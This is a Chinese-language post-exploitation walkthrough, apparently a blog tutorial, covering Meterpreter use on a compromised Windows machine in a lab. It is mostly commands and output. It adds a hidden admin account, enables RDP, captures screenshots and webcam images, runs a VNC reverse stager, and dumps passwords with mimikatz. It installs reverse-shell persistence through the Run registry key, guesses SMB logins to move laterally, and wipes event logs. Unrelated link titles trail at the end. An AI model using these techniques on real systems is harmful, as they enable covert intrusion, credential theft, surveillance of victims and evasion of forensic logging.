C:\Windows\system32>net localgroup administrators test /addnet localgroup administrators test /add
命令成功完成。C:\Windows\system32>net user test
net user test
用户名 test
全名
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不上次设置密码 2019/10/13 11:11:32
密码到期 2019/11/24 11:11:32
密码可更改 2019/10/13 11:11:32
需要密码 Yes
用户可以更改密码 Yes允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2019/10/13 11:12:03可允许的登录小时数 All本地组成员 *Administrators *Users
全局组成员 *None
命令成功完成。C:\Windows\system32>可以看到,现在用户test已经同时属于Administrators和Users组了。
##使用用户远程登录
- 开启远程桌面rdp
meterpreter > run post/windows/manage/enable_rdp [*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191012054909_default_192.168.8.129_host.windows.cle_038774.txt
meterpreter > 也可以使用如下命令,达到同样的效果:
meterpreter > run getgui -e[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.5056.rc
meterpreter > - 登录前检查
远程桌面连接前,先检查下受害用户的空闲时长,因为远程登录会把当前用户踢掉,在登录过程中也会显式提醒:
meterpreter > idletime
User has been idle for: 3 hours 48 mins 26 secs
meterpreter > - 使用rdesktop连接目标桌面
root@kali:~# rdesktop 192.168.1.8
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16此时弹出GUI界面,输入用户名/密码进行登录 。
账户隐藏
上面新添加的用户可以在目标机器登录界面上看到,因此需要隐藏。
略。
端口转发
下面将远程机器192.168.1.8的3389端口反弹到本地9833端口,然后连接本地9833端口,同样达到远程桌面的效果。
meterpreter > portfwd add -l 9833 -r 192.168.1.8 -p 3389
[*] Local TCP relay created: :9833 <-> 192.168.1.8:3389
meterpreter > 端口转发成功,现在使用rdesktop进行本地连接:
root@kali:~# rdesktop 127.0.0.1:9833
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
root@kali:~# 弹出GUI界面,使用用户名/密码登录成功。
屏幕截图
meterpreter > screenshot
Screenshot saved to: /root/aAKvRlgG.jpeg
meterpreter > ##操作摄像头
-
获取摄像头列表
webcam-list -
从指定的摄像头拍摄照片
webcam_snap -
从指定的摄像头实时视频流
webcam_stream
VNC控制
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\QwdqufeOMpX.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
meterpreter > /usr/bin/vncviewer: VNC server closed connection不知道为什么失败了,经过测试,发现当受害者机器在锁屏界面或者普通用户登录进去的界面时会报这个错。
当管理员用户登录进去时,再运行命令,可以成功,如下:
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\plKeHIXhzUQQ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
meterpreter > No authentication needed
Authentication successful
Desktop name "pc"
VNC server default format:32 bits per pixel.Least significant byte first in each pixel.True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:32 bits per pixel.Least significant byte first in each pixel.True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding成功弹出VNC图形界面,看到受害者桌面。
##文件操作
可以在meterpreter中使用cd、ls、cat、rm、mkdir等常规命令。
- 上传文件
meterpreter > upload /root/flag.txt
[*] uploading : /root/flag.txt -> flag.txt
[*] Uploaded 9.00 B of 9.00 B (100.0%): /root/flag.txt -> flag.txt
[*] uploaded : /root/flag.txt -> flag.txt
meterpreter > 使用pwd可以查看当前目录,即文件被传到哪里了。
- 运行文件
meterpreter > execute -i -f cmd.exe
Process 1020 created.
Channel 40 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\>比如上传mimikatz程序,然后执行execute -i -f mimikatz.exe ,进入mimikatz的交互界面。
然后执行下列命令获取密码:
privilege::debug
sekurlsa::logonpasswords
execute命令详解:
-f 指定可执行文件
-i 跟进程进行交互
-H 创建一个隐藏进程
-a 传递给命令的参数
-m 从内存中执行
-s 在给定会话中执行进程
-t 使用当前伪造的线程令牌运行进行
- 下载文件
meterpreter > download "c:\Windows\System32\drivers\etc\hosts"
[*] Downloading: c:\Windows\System32\drivers\etc\hosts -> hosts
[*] Downloaded 824.00 B of 824.00 B (100.0%): c:\Windows\System32\drivers\etc\hosts -> hosts
[*] download : c:\Windows\System32\drivers\etc\hosts -> hosts
meterpreter > ##持久化
-
启动项
用msfvenom命令生成一个反弹shell后面,然后放到目标机器下列路径达到开机自启动的效果:
C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup我们只要监听相应的端口就行了。
-
系统服务
meterpreter > run persistence -X -i 5 -p 8888 -r 192.168.1.6[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/PC_20191013.2138/PC_20191013.2138.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8888
[*] Persistent agent script is 99669 bytes long
[+] Persistent Script written to C:\Windows\TEMP\OueYyJlRdu.vbs
[*] Executing script C:\Windows\TEMP\OueYyJlRdu.vbs
[+] Agent executed with PID 3776
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
meterpreter > persisrence参数说明:
-X 开机启动,-i 反向连接间隔, -r 连接的主机,-p 连接的端口
每隔5秒反弹到192.168.1.6到8888端口,如下:
root@kali:~# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.8] 49195目标机器重启后仍然有效。
实际场景中,还是使用metasploit类的工具等待反弹:
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.1.6:8888
[*] Sending stage (179779 bytes) to 192.168.1.8
[*] Meterpreter session 2 opened (192.168.1.6:8888 -> 192.168.1.8:49267) at 2019-10-13 01:05:56 -0400meterpreter > getuid
Server username: PC\xman666
meterpreter > 持久化需要考虑杀软等,这里会报警。
横向移动
获取子网信息
meterpreter > run get_local_subnets[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > 使用metasploit模块查看一下该局域网开启3389的服务器。
use auxiliary/scanner/rdp/rdp_scanner
set rhosts 10.0.15.10-33
run
扫描smb登录
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.0.15.10-33
set SMBUser administrator
set SMBPass 123456a?
run
remotewinenum
有时候,不能直接远程桌面登录另外一台Window机器,这个时候可以使用Enter-PSSession命令,通过PowerShell终端登到远程的Window机器,这个时候,就需要被访问的机器打开5985 或者5986 端口。 默认情况下,Window 2008 Server或者Window 2012 Server会自动默认开启WinRM的服务器,从而暴露5985或者5986端口。
Enter-PSSession -computerName Server-R2
清除痕迹
meterpreter > clearev
[*] Wiping 8202 records from Application...
[*] Wiping 23907 records from System...
[*] Wiping 8154 records from Security...
meterpreter > 
)
—— 大模型实现PDF检索加QA)
——北大肖臻课程)
服务器探索ffmpeg笔记 (命令行、Nvidia硬件加速、GPU、CPU、CUDA、h264_nvenc、过滤器、加水印))